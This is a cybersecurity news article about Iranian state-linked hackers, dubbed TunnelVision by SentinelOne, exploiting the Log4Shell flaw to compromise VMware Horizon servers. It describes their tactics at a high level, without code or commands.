Iranian hackers actively exploiting Log4j vulnerability to compromise VMware Horizon servers

Iranian state hackers are actively exploiting Log4j vulnerability to compromise VMware Horizon servers

Image:
Iranian state hackers are actively exploiting Log4j vulnerability to compromise VMware Horizon servers

After successfully exploiting the bug, they can run malicious PowerShell commands, install backdoors, and steal credentials from infected machines

Iran state-sponsored hackers are actively exploiting the critical Log4j vulnerability to deploy backdoors on vulnerable VMware Horizon servers in efforts to collect sensitive information from victims, researchers from cyber security firm SentinelOne have warned.

The SentinelOne researchers named the group 'TunnelVision,' due to the group's heavy reliance on tunnelling tools. According to them, the tools and tactics used by the group are very much similar to those used by a larger group tracked under the moniker Charming Kitten, Nemesis Kitten and Phosphorus.

TunnelVision actions are characterised by widespread abuse of so-called 1-day vulnerabilities to hack organisations that are yet to install the recently released patches.

Microsoft Exchange ProxyShell bug and flaws in FortiOS (CVE-2018-13379) are two of the group's better-known targets.

"The most commonly deployed tunnelling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink," according to researchers.

SentinelOne's Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report that TunnelVision attackers are currently exploiting the Log4Shell bug on vulnerable systems to run malicious PowerShell commands, install backdoors, steal credentials and perform lateral movement.

VMware Horizon is a widely used desktop and app virtualisation product that runs on Windows, macOS and Linux. It is vulnerable to the Log4Shell flaws in the Log4J Java logging library.

Log4Shell, tracked as CVE-2021-44228, is a highly dangerous and easy to exploit flaw that lets malicious actors to gain remote control over machines running apps in the Java programming language.

According to researchers, this vulnerability is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j vulnerable component.

After the bug was uncovered in December, Bitdefender said it had observed multiple attempts by attackers to deploy a ransomware payload on vulnerable systems by making use of the Log4Shell bug. Microsoft also confirmed Bitdefender findings, stating that it had seen threat actors attempting to deliver Khonsari ransomware on self-hosted Minecraft server by exploiting Log4Shell.

In the latest attacks by Iranian hackers, SentinelOne observed that threat actors typically exploited the Log4j vulnerability to run PowerShell commands directly, and then executed additional commands by means of PS reverse shells, executed via the Tomcat process.

VMware often uses Apache Tomcat for the deployment of Java web applications. TunnelVision hackers were also able to remotely control the networks using this server.

After installing the PowerShell, the group can easily carry out various malicious activities, including:

Researchers also observed that the Iranian hackers used multiple "legitimate" services to achieve and obscure their activities. Those services include:

This is not the first time that hackers have used Log4j bugs to compromise VMware Horizon servers.

Last month, the NHS cyber alert service warned that an unknown threat group was attacking unpatched VMware Horizon servers using the Log4Shell vulnerability in order to establish a presence within the affected networks.

Having achieved that objective, the attackers could steal data or deploy malicious software such as ransomware, it warned.

And Horizon is not the only VMware software affected by Log4Shell bug.

Machines running VMware vCenter Server instance have also been attacked, including by the Conti ransomware gang.